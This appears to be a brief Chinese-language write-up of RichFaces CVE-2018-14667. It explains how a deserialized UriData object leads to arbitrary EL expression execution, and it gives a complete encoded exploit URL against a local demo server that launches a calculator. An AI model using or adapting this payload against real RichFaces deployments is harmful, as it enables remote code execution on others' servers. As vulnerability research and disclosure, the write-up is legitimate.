RichFaces CVE-2018-14667
0x00 RichFaces 简述
RichFaces是一个基于LGPL协议开放源代码的JSF(JavaServer Faces)组件库,它能够使应用开发方便地集成AJAX。现在的RichFaces库是由Ajax4jsf和RichFaces两部分组成
0x01
0x01 漏洞成因
Java RichFaces框架中包含一个RCE漏洞,恶意***者构造包含org.ajax4jsf.resource.UserResource$UriData序列化对象的特定UserResource请求,RichFaces会先反序列化该UriData对象,然后使用EL表达式解析并获取resource的modified、expires等值导致了任意EL表达式执行,通过构造特殊的EL表达式可实现远程任意代码执行。
参考链接中有具体的分析
0x02 payload
弹出计算器(windows)
http://127.0.0.1:8080/richfaces-demo-3.3.0.GA-tomcat6/a4j/s/3_3_0.GAorg.ajax4jsf.resource.UserResource/n/s/-1487394660/DATA/eAHNlc9rE0EUx6fRan!4o9pirSLEVWwqMttKPdQaKFRRIbXQtFXbg0w2L8nE2R-dnU0Wa6U9ePEiWnrz5rU9eZcWEUHw4l-gBxERoQhexZnZNLFBPfQSc5rdfft9732-b19Wv6Fmn6OzLs9jUiThYNHPYQ6-G3AL8JQPfKJycXqK08tEEKR-nRe-xtDuFNpvcSACRl1HgCMEOpwqkhIxGXHy5nimCJYYTqG9EHpUas6hB6gphVpsN0tzFLKV6-YSYQHoi9CTtZxREiHOEQt8bLm25zpSG6eFTHTNZVngaVICfvvti-Tys3djMRRLoVaLEd-!QWzYXkNacOrkZQ1tvnwnqzUEOhJVSV0zDZwSRu-RDIPh0FPpe2VK7AeOLoCB8DEwPEnyYyAKbvZK6MlOfOo6mgNCTfsQCjnqiYqWofVxc6nu9pnHHzdjOq6zGldTev7wUfr7zPtLKkJVMKTM4NQqRAgCionnMWoRIdNGHOqT3OQyBDhOrCxdXJ34pJl0ZYgPkQm1XAId082HJjBzWoGvPZOY9niEayOP16Lqcw2HyqsWWWhcFVrMuL5mVKd23fbY0NpC261l0RsxOlrtvS603LY4-2H95xMFQGm3lldQeGqew1wAvsB5EKPK3kRf9ZhyiZwDeYPJQ!TQUOpYTR6eCBxBbTB0fFR-wpAqtfvUKbl3IeEEjPVhCMFKGBZhVtzoW!iHlZ4Xyq5Pbuu6no5qO7PZ!aN949CYaluzKt9vYD8o4KhzVvsZ4al8FGvvpz9!OTF!VY-dnOaYQF2aIXXxeCC8QMhAILZAHTW00TxJEOU36LVZHVLThiwl0VsmhERCAN8sepBP6zMOC8Jm8ZH-c!3xkYGB8wODSWPb6kg2ym4j1Htpl948f!n068b19y9f2duhFQ6Wn6LFRnURh2jFogPaqkBQhuWyBmXUK7SxM6MKcmXeyQVO0qio!wcmKd49Fd7LaKlhvLf-w!4EfB293BnwYuCLpLEl3UDaArUo8yfl9v0Fa!nW8w__.jsf